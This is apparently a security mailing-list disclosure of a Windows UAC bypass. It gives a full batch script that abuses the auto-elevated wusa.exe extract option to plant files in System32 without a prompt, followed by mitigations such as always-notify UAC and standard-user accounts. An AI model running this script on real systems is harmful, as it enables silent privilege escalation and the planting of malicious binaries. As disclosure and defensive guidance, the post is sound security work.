Hi @ll, the exploit shown here should be well-known to every Windows administrator, developer or QA engineer.
In Microsoft's own terms it doesn't qualify as security vulnerability since UAC is a security feature, not a security boundary. Preconditions: * a user running as "protected Administrator" on Windows 7 and newer with standard UAC settings. JFTR: this is the default for "out-of-the-box" installations and typically almost never changed! * some executables in directory %SystemRoot%\, but not in directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\); JFTR: REGEDIT.EXE is one of these executables, and it has a manifest which specifies <requestedExecutionLevel level="highestAvailable">, so users running as "protected Administrator" are accustomed to the UAC prompt when they start REGEDIT.EXE and will most probably acknowledge the privilege elevation. Exploit (to be run as a batch script): for %%! in ("%SystemRoot%\*.exe" "%SystemRoot%\*.dll") do call :PLANT "%%~nx!" exit /b :PLANT if exist "%SystemRoot%\System32\%~1" goto :EOF copy NUL: "%TEMP%\%~1" "%SystemRoot%\System32\makecab.exe" "%TEMP%\%~1" "%TEMP%\dummy.cab" "%SystemRoot%\System32\wusa.exe" "%TEMP%\dummy.cab" /extract:"%SystemRoot%\System32" if /I "%~x1" == ".exe" "%~1" /? WUSA.EXE is one of the about 70 Microsoft programs which are UAC-autoelevated since Windows 7, so the user doesn't need to answer the UAC prompt when the batch script plants a file in the directory "%SystemRoot%\System32\" Mitigations: * set the UAC control to "ask always" (as it was in Windows Vista) * remove the user accounts created during setup from the "Administrators" group and place them in the "Users" group, i.e. demote these accounts from "Administrator" to "Standard user". Start->Run "control.exe userpasswords2" alias "rundll32.exe netplwiz.dll,UsersRunDll" allows this operation! JFTR: don't forget to enable the builtin "Administrator" account. Cf. <http://windows.microsoft.com/en-us/windows/user-accounts-faq> | There are three types of accounts. Each type gives you a different | level of control over the PC: | * Administrator accounts provide the most control over a PC, and | should be used sparingly. You probably created this type of | account when you first started using your PC. | * Standard accounts are for everyday use. If you're setting up | accounts for other people on your PC, it's a good idea to give | them standard accounts. stay tuned Stefan Kanthak